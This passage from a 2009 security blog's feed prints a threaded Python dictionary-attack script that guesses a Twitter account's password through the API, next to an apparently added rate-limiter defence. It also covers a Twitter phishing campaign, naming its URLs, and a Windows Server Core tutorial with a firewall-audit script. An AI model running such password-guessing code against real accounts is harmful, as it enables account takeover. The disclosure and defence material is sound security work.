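    def __init__(self, clock=time.time, limit=MAX_REQUESTS, window=WINDOW_SECONDS):
        self._clock = clock
        self._limit = limit
        self._window = window
        self._buckets = {}  # key -> (window_start, count)

    def _hit(self, key, now):
        start, count = self._buckets.get(key, (now, 0))
        if now - start >= self._window:   # window expired: start a fresh one
            start, count = now, 0
        count += 1
        self._buckets[key] = (start, count)
        return count <= self._limit

    def allow(self, source_ip, username):
        now = self._clock()
        # Both buckets are charged on every call (no short-circuit), so a
        # request rejected by one key still counts against the other.
        ip_ok = self._hit(("ip", source_ip), now)
        user_ok = self._hit(("user", username.lower()), now)
        return ip_ok and user_ok


# Constructed credential store standing in for the real backend.
_USERS = {"_eeeeeeeek": "correct-horse"}


def check_password(username, password):
    return _USERS.get(username) == password


def verify_credentials(limiter, source_ip, username, password):
    """Endpoint handler returning an HTTP status code. The limiter runs
    before the password check, so over-limit requests never touch the
    credential store and give no 200/401 signal."""
    if not limiter.allow(source_ip, username):
        return 429
    return 200 if check_password(username, password) else 401


def simulate_guessing_run(attempts, source_ips):
    """Replays a run like the post's against the limiter: one account,
    one wrong password per attempt, spread over source_ips, at about
    2.5 requests per second. Returns {status_code: count}."""
    fake_now = [0.0]
    limiter = VerifyCredentialsLimiter(clock=lambda: fake_now[0])
    counts = defaultdict(int)
    for i in range(attempts):
        fake_now[0] += 0.4
        ip = source_ips[i % len(source_ips)]
        counts[verify_credentials(limiter, ip, "_eeeeeeeek", str(i))] += 1
    return dict(counts)
```

With this in place the 300-attempt run from the post gets 15 answers and 285 rejections whether it comes from one IP or six, which is the behaviour the quoted documentation describes.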

<p>As we like Twitter as much as the next, and because we are in favor of good faith disclosure, we have notified them of our concerns. <em>Update</em>: A Twitter representative has responded that the information provided has been sent on to the right internal team at Twitter.</p>

<p>Here&#8217;s the Code: <a href="http://praetorianprefect.com/wp-content/uploads/2009/09/threadedtwitter.py.txt" title="threadedtwitter.py">threadedtwitter.py</a>
<br />
Dictionary: <a href="http://praetorianprefect.com/wp-content/uploads/2009/09/dic.txt" title="dic.txt">dic.txt</a></p>

<p><em>Please note, the code is provided for demonstration purposes only, should not be run ever, and contains intentional errors so that attempts to run it will not work.</em></p>

<p>The command is as follows: twitterauthcheck.py username passwordlist.txt</p>

<pre><code>import threading,Queue
import socket
import tweethon
import urllib2
import socket
import sys

class Threader:
    # Class taken from: Sept 3 2004, Justin A: http://code.activestate.com/recipes/302746/
    def __init__(self, numthreads):
        self._numthreads=numthreads

    def get_data(self,):
        raise NotImplementedError, "You must implement get_data as a function that returns an iterable"
        return range(10000)
    def handle_data(self,data):
        raise NotImplementedError, "You must implement handle_data as a function that returns anything"
        time.sleep(random.randrange(1,5))
        return data*data
    def handle_result(self, data, result):
        raise NotImplementedError, "You must implement handle_result as a function that does anything"
        print data, result

    def _handle_data(self):
        while 1:
            x=self.Q.get()
            if x is None:
                break
            self.DQ.put((x,self.handle_data(x)))

    def _handle_result(self):
        while 1:
            x,xa=self.DQ.get()
            if x is None:
                break
            self.handle_result(x, xa)

    def run(self):
        if hasattr(self, "prerun"):
            self.prerun()
        self.Q=Queue.Queue()
        self.DQ=Queue.Queue()
        ts=[]
        for x in range(self._numthreads):
            t=threading.Thread(target=self._handle_data)
            t.start()
            ts.append(t)

        at=threading.Thread(target=self._handle_result)
        at.start()

        try :
            for x in self.get_data():
                self.Q.put(x)
        except NotImplementedError, e:
            print e
        for x in range(self._numthreads):
            self.Q.put(None)
        for t in ts:
            t.join()
        self.DQ.put((None,None))
        at.join()
        if hasattr(self, "postrun"):
            return self.postrun()
        return None


class twitterpasswordtester(Threader):

    def get_data(self):
        data = open(sys.argv[2]).read()
        data = data.split('\n')
        self._usename = sys.argv[1]
        self.counter = 0
        return data

    def handle_data(self,p):
        print "in testAuth"
        u = self._usename
        x = tweethon.Api(username=u, password=p)
        x.SetCache(None)
        try:
            x.VerifyCredentials()
            results = "login: {0} Password: {1} accepted\n".format(u, p)
        except urllib2.HTTPError, e:
            results = "login: {0} Password: {1} failed: {2}\n".format(u, p, e)
        finally:
            del x
            return results

    def handle_result(self, data, result):
        print result
        print self.counter 
        self.counter += 1
        self.res.append((data,result))
    def prerun(self):
        self.res=[]
    def postrun(self):
        return self.res


z = twitterpasswordtester(10)
for n,ns in  a.run():
    print n,ns
</code></pre>

<p>Tweethon Source: <a href="http://bitbucket.org/jrossi/tweethon/src/tip/README">http://bitbucket.org/jrossi/tweethon/src/tip/README</a></p>

<p><em>The Tweethon library, the only custom or uncommon library above, is intended to make the <a href="http://twitter.com/help/api">Twitter web services API</a> easier for python programmers to use.</em></p>

]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/09/breaking-twitter-authentication/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>ROFL this you on here? The latest Twitter Worm</title>
		<link>http://praetorianprefect.com/archives/2009/09/rofl-this-you-on-here-the-latest-twitter-worm/</link>
		<comments>http://praetorianprefect.com/archives/2009/09/rofl-this-you-on-here-the-latest-twitter-worm/#comments</comments>
		<pubDate>Thu, 24 Sep 2009 08:25:29 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Phishing]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[captcha]]></category>
		<category><![CDATA[china]]></category>
		<category><![CDATA[money mule]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=484</guid>
		<description><![CDATA[At 2pm on Wednesday 9/24, wide scale reports started showing up on Twitter that a new Twitter worm sends you a direct message with the content “rofl this you on here? http://videos.twitter.secure-logins01.com”.  The link opens a Twitter style log in page (albeit Twitter’s previous version of this page, they have a new one) which, except for being an old version and a stray angle bracket is convincing.  Upon logging in the user’s credentials are stolen, and presumably direct messages are sent to each follower that user has.]]></description>
			<content:encoded><![CDATA[<p>At 2pm on Wednesday 9/24, wide scale reports started showing up on Twitter that a new Twitter worm sends you a direct message with the content “rofl this you on here? http://videos.twitter.secure-logins01.com”.  The link opens a Twitter style log in page (albeit Twitter’s previous version of this page, they have a new one) which, except for being an old version and a stray angle bracket is convincing.  Upon logging in the user’s credentials are stolen, and presumably direct messages are sent to each follower that user has.</p>

<div id="attachment_488" class="wp-caption alignleft" style="width: 160px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/09/twitter_spoofedhomepage1.gif"><img src="http://praetorianprefect.com/wp-content/uploads/2009/09/twitter_spoofedhomepage1-150x150.gif" alt="The phishing site&#039;s Twitter login page." title="The spoofed Twitter homepage" width="150" height="150" class="size-thumbnail wp-image-488" /></a><p class="wp-caption-text">The phishing site's Twitter login page.</p></div>
<div id="attachment_490" class="wp-caption alignleft" style="width: 160px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/09/twitter_newhomepage.gif"><img src="http://praetorianprefect.com/wp-content/uploads/2009/09/twitter_newhomepage-150x150.gif" alt="The real Twitter homepage" title="Twitter&#039;s real homepage" width="150" height="150" class="size-thumbnail wp-image-490" /></a><p class="wp-caption-text">The real Twitter homepage</p></div>

<p>Because direct messages are private, nobody but Twitter itself can pinpoint both when the attack began and how it was originally seeded (whether through compromised user accounts, previously set up spam/bot accounts, or another method).  A number of accounts appear to have been affected; by 5pm TwitScoop (a service that monitors popular Twitter trends) started reporting trending words including “hacked”, “worm”, and “spreading”.  The attack is effective based on two classic principles of social engineering: the message comes from someone you have previously followed (and implicitly trust on some level), and the message appeals to a combination of curiosity and vanity.</p>

<p>On Twitter you can only send a direct message to someone who is following you. Or put another way, only someone whose updates you have previously expressed an interest in and signed up for (followed) can send you one of these messages.  This attack is the Twitter equivalent of e-mail phishing schemes that use an e-mail sent from someone else’s address book, essentially you theoretically know the person already and are more likely to open an e-mail received from them.  Combine the suggestion that this person you know or know of has found a video of you online, a login screen that is familiar, and you end up with a number of compromised Twitter accounts.</p>

<div id="attachment_494" class="wp-caption alignnone" style="width: 365px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/09/Tweetie.png"><img src="http://praetorianprefect.com/wp-content/uploads/2009/09/Tweetie.png" alt="The direct message containing the link to the spoofed Twitter login." title="The Direct Message" width="355" height="118" class="size-full wp-image-494" /></a><p class="wp-caption-text">The direct message containing the link to the spoofed Twitter login.</p></div>

<p>This is far from the first worm Twitter has faced (Koobface, StalkDaily, mikeyy), and is not even the first direct message phishing attack <a href="http://blog.twitter.com/2009/01/gone-phishing.html">in this style</a>.  While labeled a worm on Twitter, it is not confirmed thus far that this is a self-replicating program, an important part of the definition of a computer worm; it just appears that way.  To establish this, Twitter would have to release some analysis of its logging showing a correlation between a compromised Twitter account, a direct message to a group of parties, a subsequent compromise and direct message from within that second group, and so on down the chain.  For now we’ll assume this is the path the attack is taking, based on the evidence we have noticed thus far.  Regardless, since everyone is referring to this as a Twitter worm, for the sake of clarity we’ll continue to call it a worm here and update if proven otherwise.</p>

<p>What happened if you did go ahead and put credentials in the login screen: Fail Whale.</p>

<div id="attachment_1289" class="wp-caption alignleft" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/09/twphish.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/09/twphish-300x222.jpg" alt="If you put some string in for the login or password, this is what you get." title="twphish" width="300" height="222" class="size-medium wp-image-1289" /></a><p class="wp-caption-text">If you put some string in for the login or password, this is the response.</p></div>

<h4>No Newcomer</h4>

<p>According to GeoIP, the URL in question is hosted in Beijing, China; the host is listed as Chinanet Yunnan Province Network, which is the internet service of China Telecom (the 3rd biggest mobile telecom provider in China).  The e-mail address used in the registration, lixing688@gmail.com, links this to similar phishing sites for Twitter and MySpace identified in the malwaredomainlist forums back in July.  That time around the site URL was secure-login.twitter.verifiylogin.com/twitter/, and MySpace was cloned at rnyspece.com.</p>

<p>Another URL, Faecibook.com, with the same e-mail address for registrar is a phishing site that appears to prey on users in a way very similar to the Twitter attack, posting comments on Facebook such as this: <em>“seen this really bad blog about you? http://www.jdsense.com/search/redirect.php?f=http://blogs.faecibook.com/sessionid?nglnbskuf”</em>.</p>

<p>That e-mail was also used in a series of money transfer agent scams (money mules) with bogus charity phishing web sites (KPEREZHOME, Rodney Lawrence International, Edward White, et al.), all hosted on a <a href="http://www.infoworld.com/d/developer-world/worst-registrar-xin-net-crackdown-requested-194">problematic registrar</a>, the Xin Net Technology Corporation.</p>

<p>A photographer, Warren Henke, <a href="http://www.warrenhenke.com/blogs/rants/glen-hamilton-international-organization">wrote a blog post</a> describing receipt of a phishing e-mail associated with this scam from the Glen Hamilton International Organization.</p>

<div id="attachment_506" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/09/rodney-lawrence-international.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/09/rodney-lawrence-international-300x228.jpg" alt="The phishing site." title="Rodney Lawrence International" width="300" height="228" class="size-medium wp-image-506" /></a><p class="wp-caption-text">The Rodney Lawrence International phishing site.</p></div>

<h4>Something New</h4>

<p>One of the differences with this attack that separates it from previous ones is that in the time since the more famous compromises of January of this year (Barack Obama, Britney Spears, CBS News, Kevin Rose) Twitter has implemented some controls around the login screen, including a CAPTCHA element that shows up after several bad password entries.</p>

<p>CAPTCHA is a program designed to differentiate humans from computers and prevent abuse by bots, automated programs used to generate spam among other things.  It is a contrived acronym standing for Completely Automated Public Turing test to tell Computers and Humans Apart. CAPTCHA has three primary principles: the computer can’t solve it, most humans can, and the tool does not rely on some form of obscurity such as being a new implementation.</p>

<div id="attachment_498" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/09/capchascreen1.gif"><img src="http://praetorianprefect.com/wp-content/uploads/2009/09/capchascreen1-300x179.gif" alt="reCAPTCHA, a free service that combines CAPTCHA with the digitizing of printed books, newspapers, and old radio shows." title="ReCaptcha" width="300" height="179" class="size-medium wp-image-498" /></a><p class="wp-caption-text">reCAPTCHA, a free service that combines CAPTCHA with the digitizing of printed books, newspapers, and old radio shows.</p></div>

<p>Actually, reCAPTCHA is used: a free service that combines CAPTCHA with the digitizing of printed books, newspapers, and old radio shows.  When you translate the image to text, you are acting as a human optical character recognition (OCR) engine.  The service was acquired by Google this month.</p>

<p>Circumventions of CAPTCHA have occurred at each step in the method’s evolution, ever since it first came into wide use with Yahoo’s EZ-Gimpy program, and they follow roughly the same three-step process: pre-processing (removing the background obscurities), segmentation (separating the letters), and classification (identifying each letter).  Segmentation remains the one area where humans outperform computers; however, spammers are achieving some level of success here too.  Here is a good analysis from WebSense detailing how a service in Russia is achieving a <a href="http://securitylabs.websense.com/content/Blogs/2919.aspx">20% rate in automated breaks</a> of CAPTCHA images.</p>

<p>So CAPTCHA, while not perfect, does help mitigate dictionary brute force password attacks in that it adds another layer of complexity to the authentication process.  Some of the reasons for beating CAPTCHA are to be able to post blog comment spam, create fraudulent accounts such as the e-mail example above, and similar automated completion of web forms designed for human interaction.  In these applications it makes sense: a download of the image, a translation to text, and the comment spam is posted, the e-mail account created, and so forth.  If two or three out of every ten requests is successful, the comment will be posted or new account opened at an acceptable rate.</p>

<p>A password cracking application, on the other hand, moves through a large number of password possibilities for each id as quickly as possible; the additional processing per attempt, combined with a less than perfect translation rate, adds a level of complexity that is likely not worth the effort.  With that in mind, how does the bad actor break into Twitter accounts easily?</p>

<p>The answer may lie in the Twitter API, which limits the rate of requests but still allows a large request rate if you ask for it.  That is not to suggest that this is definitely what this attacker did; in fact the bad actor in this case may have previously had compromised ids, may have used more conventional spam tactics to get an original seeding of ids, or may have broken into a few early accounts as discussed here.  Only Twitter could potentially have the log access to figure this out.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/">Persistent XSS on Twitter.com</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/09/rofl-this-you-on-here-the-latest-twitter-worm/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>2008 Server to the Core</title>
		<link>http://praetorianprefect.com/archives/2009/09/2008-server-to-the-core/</link>
		<comments>http://praetorianprefect.com/archives/2009/09/2008-server-to-the-core/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 21:47:06 +0000</pubDate>
		<dc:creator>Simon Price</dc:creator>
				<category><![CDATA[Administration]]></category>
		<category><![CDATA[Featured]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[active directory]]></category>
		<category><![CDATA[cli]]></category>
		<category><![CDATA[firewall]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[scripting]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[windows 2008]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=398</guid>
		<description><![CDATA[One of my favorite websites in the days of Windows 2000 Server was a project from a group of system managers from the Department of Electrical Engineering at the Swiss Federal Institute of Technology; it was titled “Real Men Don&#8217;t Click”, and it was dedicated to accomplishing tasks solely using the command line interface (CLI). [...]]]></description>
			<content:encoded><![CDATA[<p>One of my favorite websites in the days of Windows 2000 Server was a project from a group of system managers from the Department of Electrical Engineering at the Swiss Federal Institute of Technology; it was titled “Real Men Don&#8217;t Click”, and it was dedicated to accomplishing tasks solely using the command line interface (CLI). I was glad to see I wasn&#8217;t the only CLI fan in the Windows world who wasn&#8217;t inherently a former UNIX guy. Well, discounting the fact our friends at SFIT were inherently UNIX guys, they were very fair in their presentation of how to get around in the CLI.</p>

<p>This article is not just for the CLI fans like me, who snicker when forced to grab at the mouse for tasks they much prefer taking on in that wonderful black box with the blinking cursor; but for anyone who will deploy a core installation of Windows. This is not an anti-GUI rant, but a look into the CLI, and one that is much needed after Microsoft released Windows 2008 Server Core Edition.</p>

<p>Microsoft started to return CLI tools back to administrators in Windows 2000 when they released <code>netsh.exe</code>. More and more CLI options surfaced with releases of Support Tools, Resource Kits, and the popular PS suite from SysInternals (now Microsoft). The most recent evidence of the resurgence of the CLI is Windows 2008 Server Core Edition. This version is entirely driven with the command line interface.</p>

<p>The following roles are supported in a core installation:</p>

<ul>
    <li>Active Directory Certificate Services</li>
    <li>Active Directory Domain Services</li>
    <li>Active Directory Lightweight Directory Services (AD LDS)</li>
    <li>DHCP Server</li>
    <li>DNS Server</li>
    <li>File Services (including File Server Resource Manager)</li>
    <li>Hyper-V</li>
    <li>Print and Document Services</li>
    <li>Web Server (including a subset of ASP.NET)</li>
</ul>

<p>Why choose core over a standard installation? A core setup will only install the binaries needed by the server roles. Microsoft claims that if Windows 2000 Server had a core edition, it would have had a <strong>60% reduction</strong> in patches (40% in Windows 2003). This is a considerable amount of patches for critical servers such as domain controllers.</p>

<p>So let’s get started with some administration tasks in Windows 2008 Server Core Edition: getting things up and running, configuring roles, promoting to a domain controller, and essentially running a version of Microsoft&#8217;s OS that does not include explorer.exe. (What? No Desktop?)</p>

<p>The following commands were executed on an installation of Microsoft Windows 2008 Server Core Standard R2. For those who don&#8217;t have the time to muck with the CLI, R2 includes a new VBScript (<strong>sconfig.vbs</strong>) which provides a menu driven server configuration tool to quickly get through these steps. However, I recommend doing it the long way at least once to understand what&#8217;s happening in case you run into issues in the future. The install is straightforward, so details are not needed. The most important choice is which version of the OS to install, for which I selected Windows 2008 R2 Standard (Server Core Installation). After a dialog to set the administrator password, I&#8217;m left with a DOS prompt.</p>

<p><strong><span style="text-decoration: underline;">GETTING STARTED</span></strong></p>

<p>First things first, IP connectivity. I&#8217;ll be using 192.168.1.0/24 for the network:</p>

<p><em><span style="font-size: xx-small;">Note: netsh.exe allows you to add all the options/parameters in one line, or you can run netsh.exe and go into each configuration category, (ie. interface), then eventually when deep enough into the options, execute the command, (ie. set). To keep it simple, I&#8217;ll write out the commands in single lines, but definitely run netsh.exe with no options and look into the many configuration areas available.</span></em></p>

<p>Let’s list available network interfaces to see which one we need to configure:</p>

<pre><code>netsh interface ipv4 show interfaces
</code></pre>

<p>Result:</p>
<pre><code>  Idx     Met        MTU           State                Name
  ---  ----------  ----------  ------------  ---------------------------
    3           5        1500  connected     Local Area Connection
    1          50  4294967295  connected     Loopback Pseudo-Interface 1
</code></pre>
<p>Local Area Connection is the interface I’m interested in, and it has Idx=3. Let&#8217;s set an IP on that interface:</p>

<pre><code>netsh int ipv4 set address name=3 source=static address=192.168.1.25 mask=255.255.255.0 gateway=192.168.1.1
</code></pre>

<p>Note the name=3 parameter; 3 was the IDX number retrieved in the previous step. You will not get a resulting output, but you can double check your settings by running <strong>ipconfig /all</strong>.</p>

<p>Next step is to add DNS servers for name resolution. If this will be the first Domain Controller in the Forest and will run DNS, you can skip this, otherwise, add your DNS servers now (the example assumes DNS servers 192.168.1.20 and 192.168.1.21):</p>

<pre><code>netsh interface ipv4 add dnsserver name=3 address=192.168.1.20 index=1
</code></pre>

<p>add a secondary dns server:</p>

<pre><code>netsh interface ipv4 add dnsserver name=3 address=192.168.1.21 index=2
</code></pre>

<p>Note that we used the name=3 parameter again to add these DNS entries to the network interface we are interested in. Once again, you can double check your settings with <strong>ipconfig /all</strong>.</p>

<p>Now we have connectivity. Let&#8217;s rename the computer and join a domain. Windows has assigned a random computer name; you can see what it is by typing <strong>hostname</strong>. Mine happened to be WIN-EPNB8G5FAUI. Let&#8217;s rename this to CORE-DEV:</p>

<pre><code>netdom renamecomputer %COMPUTERNAME% /NewName:CORE-DEV
</code></pre>

<p>You will be warned about the potential hazards of renaming the computer, not our concern since this is a brand new installation. Proceed, and you will have the following results:</p>

<pre><code>The computer needs to be restarted in order to complete the operation.

The command completed successfully.
</code></pre>

<p>Restart the computer by typing: <strong>shutdown /r /t 001</strong></p>

<p>After restarting, log back in, and let&#8217;s join a domain. Our test domain is called testdom.local. We will use an account called admin to join the domain:</p>

<pre><code>netdom join CORE-DEV /domain:testdom.local /userd:testdom\admin /passwordd:*
</code></pre>

<p align="left">The * for the password option will prompt you for the password. A reboot is again required.</p>

<p>Now you can log in with a domain account by choosing other user, then typing domain\user for the user.</p>

<p><strong><span style="text-decoration: underline;">ACTIVATION</span></strong></p>

<p>Now, let&#8217;s activate Windows. In R2, you enter the license key with slmgr.vbs (prior to R2, the installation setup prompted for the license key).</p>

<pre><code>slmgr.vbs -ipk ABCDE-FGHIJ-KLMNO-PQRST-UVWXY
</code></pre>

<p>Next, activate:</p>

<pre><code>slmgr.vbs -ato
</code></pre>

<p>If successful, you will not receive any messages back.</p>

<p><strong><span style="text-decoration: underline;">CONFIGURING AUTOMATIC UPDATES</span></strong></p>

<p>I recommend controlling the behavior of automatic updates with Group Policy, but if you need to toggle the settings, here are the commands:</p>

<p>To verify the current setting:</p>

<pre><code>cscript scregedit.wsf /AU /v
</code></pre>

<p>To enable automatic updates:</p>

<pre><code>cscript scregedit.wsf /AU 4
</code></pre>

<p>To disable automatic updates:</p>

<pre><code>cscript scregedit.wsf /AU 1
</code></pre>

<p>To check for updates:</p>

<pre><code>wuauclt /detectnow
</code></pre>

<p><strong><span style="text-decoration: underline;">FIREWALL</span></strong></p>

<p>Let&#8217;s take a look at the firewall now, since we will want to open up some rules to perform remote administrations tasks, such as using Remote Desktop or MMC tools to manage the server.</p>

<p>We can take a look at the firewall profiles by typing:</p>

<pre><code>netsh advfirewall show allprofiles
</code></pre>

<p>If you have a domain profile applied via GPO, then those will apply. You can also look at all the rules by typing:</p>

<pre><code>netsh advfirewall firewall show rule name=all
</code></pre>

<p>That command will display quite a bit of information. I like to output it to a text file and view it with notepad.</p>

<p>Now, let&#8217;s make some changes to allow remote connections to the server. Here, I don&#8217;t exactly follow the steps documented in Technet or most web sources since the commands documented will open up the ports and allow any source address. Here, we open Remote Desktop (TCP-3389) only to our subnet.</p>

<pre><code>netsh advfirewall firewall set rule name="Remote Desktop (TCP-In)" new remoteip=192.168.1.0/24
</code></pre>

<p>This changes the firewall RDP rule to allow our subnet only. The default rule is Any. Now, let&#8217;s go ahead and enable this rule:</p>

<pre><code>netsh advfirewall firewall set rule name="Remote Desktop (TCP-In)" new enable=yes
</code></pre>

<p>The firewall is now open for RDP connections from our internal subnet, but we still have to enable Remote Desktop:</p>

<pre><code>cscript %windir%\system32\SCRegEdit.wsf /ar 0
</code></pre>

<p>Now you can Remote Desktop to the server. Of course, you will only get a command prompt when you do.</p>

<p>Next, we’ll open up some rules to allow remote management using the MMC. This will allow using Computer Management, Shared Folders, Event Viewer, and other important snap-ins to manage your server. The process is the same as it was opening the Remote Desktop rule, but the rule names are different:</p>

<pre><code>netsh advfirewall firewall set rule name="Remote Administration (NP-In)" new remoteip=192.168.1.0/24
netsh advfirewall firewall set rule name="Remote Administration (NP-In)" new enable=yes
netsh advfirewall firewall set rule name="Remote Administration (RPC)" new remoteip=192.168.1.0/24
netsh advfirewall firewall set rule name="Remote Administration (RPC)" new enable=yes
netsh advfirewall firewall set rule name="Remote Administration (RPC-EPMAP)" new remoteip=192.168.1.0/24
netsh advfirewall firewall set rule name="Remote Administration (RPC-EPMAP)" new enable=yes
</code></pre>

<p>These three rules are in a group called “Remote Administration”, and if you are not concerned about modifying the rules so that only the specific subnet is allowed, you can enable the group as-is, which will allow connections from any IP:</p>

<pre><code>netsh advfirewall firewall set rule group="Remote Administration" new enable=yes
</code></pre>
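<p>The review described above (dumping every rule to a text file and reading it in notepad) can be automated. The following PowerShell script is an added example, not part of the original article: it parses the output of <code>netsh advfirewall firewall show rule name=all</code> into objects and flags enabled inbound Allow rules whose RemoteIP was never narrowed from Any, which is exactly the exposure the subnet-scoped commands above avoid. The netsh output embedded in it is a constructed sample; the script targets PowerShell 2.0 as shipped with R2.</p>

```powershell
# Added example (not from the original article): audit netsh advfirewall
# rule output and report enabled inbound Allow rules still open to "Any".
# Written for PowerShell 2.0 (no [PSCustomObject]) as shipped with 2008 R2.

# Constructed sample of netsh output, trimmed to the fields used here.
# On a real server replace it with:
#   $netshOutput = netsh advfirewall firewall show rule name=all
$netshOutput = @"
Rule Name:                            Remote Desktop (TCP-In)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private,Public
Grouping:                             Remote Desktop
LocalIP:                              Any
RemoteIP:                             192.168.1.0/24
Protocol:                             TCP
LocalPort:                            3389
RemotePort:                           Any
Edge traversal:                       No
Action:                               Allow

Rule Name:                            Remote Administration (RPC)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private,Public
Grouping:                             Remote Administration
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             TCP
LocalPort:                            RPC
RemotePort:                           Any
Edge traversal:                       No
Action:                               Allow

Rule Name:                            Core Networking - DNS (UDP-Out)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Profiles:                             Domain,Private,Public
Grouping:                             Core Networking
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             UDP
LocalPort:                            Any
RemotePort:                           53
Edge traversal:                       No
Action:                               Allow
"@ -split "`r?`n"

function ConvertFrom-NetshRules {
    # Turn the "Field:   value" records netsh prints into one object per rule.
    param([string[]]$Lines)
    $rules = @()
    $current = $null
    foreach ($line in $Lines) {
        if ($line -match '^Rule Name:\s+(.+)$') {
            # A new record starts at every "Rule Name:" line
            $current = @{ 'Rule Name' = $matches[1].Trim() }
        } elseif ($current -ne $null -and $line -match '^([A-Za-z ]+):\s+(.+)$') {
            $current[$matches[1].Trim()] = $matches[2].Trim()
        } elseif ($current -ne $null -and $line.Trim() -eq '') {
            # A blank line closes the record
            $rules += New-Object PSObject -Property $current
            $current = $null
        }
    }
    if ($current -ne $null) { $rules += New-Object PSObject -Property $current }
    return $rules
}

function Get-RuleOpenToAny {
    # The case the article warns about: enabled, inbound, Allow, RemoteIP = Any
    param([object[]]$Rules)
    $Rules | Where-Object {
        $_.Enabled -eq 'Yes' -and $_.Direction -eq 'In' -and
        $_.Action -eq 'Allow' -and $_.RemoteIP -eq 'Any'
    }
}

$rules = ConvertFrom-NetshRules -Lines $netshOutput
foreach ($r in (Get-RuleOpenToAny -Rules $rules)) {
    Write-Host ("OPEN TO ANY: {0} (group: {1}, {2}/{3})" -f `
        $r.'Rule Name', $r.Grouping, $r.Protocol, $r.LocalPort) -ForegroundColor Red
}
# With the constructed sample only "Remote Administration (RPC)" is reported;
# the RDP rule passes because its RemoteIP was narrowed to the subnet.
```

Run it against the live netsh output after applying the subnet-scoped rules above and any remaining hit is a rule you still need to narrow or disable.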

<p><strong><span style="text-decoration: underline;">CONFIGURING ROLES</span></strong></p>

<p>There are two commands to use when dealing with server roles: <strong>oclist</strong> and <strong>ocsetup</strong>. Later, we will look at the new <strong>dism.exe</strong>. If you type oclist, you will get a list of all the roles and their optional components. The list is pretty lengthy, so I like to use the <strong>find</strong> command to narrow my results. For example, if we wanted to add the DHCP server role, I would check for the precise name of the role by typing:</p>

<pre><code>oclist | find /i "dhcp"
</code></pre>

<p>Results:</p>

<pre><code>Not Installed: DHCPServerCore
</code></pre>

<p>Now I know the role name is specifically DHCPServerCore and that it is in fact not installed. So, we install the role by typing:</p>

<pre><code>ocsetup DHCPServerCore
</code></pre>

<p>Note that the above server role IS case sensitive. If I use oclist again to check for DHCP, I now see the following:</p>

<pre><code>oclist | find /i "dhcp"
</code></pre>

<p>Results:</p>

<pre><code>Installed: DHCPServerCore
</code></pre>

<p>If I wanted to remove the role, I&#8217;d use the uninstall switch with ocsetup:</p>

<pre><code>ocsetup DHCPServerCore /uninstall
</code></pre>

<p>Pretty straightforward. Now, with R2, there is a new CLI tool called <strong>dism.exe</strong>. This tool can also configure server roles, but it does much more. For now, we will use it to configure roles like we did with ocsetup/oclist.</p>

<p>To get a list of roles (called features in dism):</p>

<pre><code>dism /online /get-features
</code></pre>

<p>Let&#8217;s add that DHCPServerCore feature using dism:</p>

<pre><code>dism /online /enable-feature /featurename:DHCPServerCore
</code></pre>

<p>And then to remove it:</p>

<pre><code>dism /online /disable-feature /featurename:DHCPServerCore
</code></pre>

<p>So, what is the big deal? Same results as ocsetup, but dism will replace it because it goes further than just toggling features. It will service WIM and VHD image files, allowing add/remove of drivers and features, which is especially useful if your server has the role of deploying images or runs Hyper-V.</p>

<p><strong><span style="text-decoration: underline;">PROMOTING TO A DC</span></strong></p>

<p><code>dcpromo</code> is still the way to handle promoting and demoting domain controllers, but in a Server Core installation, there is no GUI wizard that comes along with it. Instead, you use an answer file with the command to instruct how to promote your DC. The syntax to this is:</p>

<pre><code>dcpromo /unattend:c:\temp\answerfile.ini
</code></pre>

<p>I like to use ini for my answer file extension, but that&#8217;s a personal preference. Here are two examples of answer files to use with dcpromo:</p>

<p>To create the very first DC in a Forest:</p>
<pre><code>[DCInstall]
ReplicaOrNewDomain=Domain
Installdns=Yes
confirmgc=yes
domainlevel=4
domainnetbiosname=TESTDOM
forestlevel=4
newdomain=forest
newdomaindnsname=testdom.local
safemodeadminpassword=password123
</code></pre>
<p>Note that the forest level and domain level are set to 4. This option is for R2 only as it is the R2 functional level. For 2008 non-R2, this value needs to be 3 instead.</p>

<p>To add a replica domain controller in an existing domain:</p>
<pre><code>[DCInstall]
ReplicaOrNewDomain=Replica
ReplicaDomainDNSName=testdom.int
Installdns=Yes
confirmgc=yes
safemodeadminpassword=password123
</code></pre>
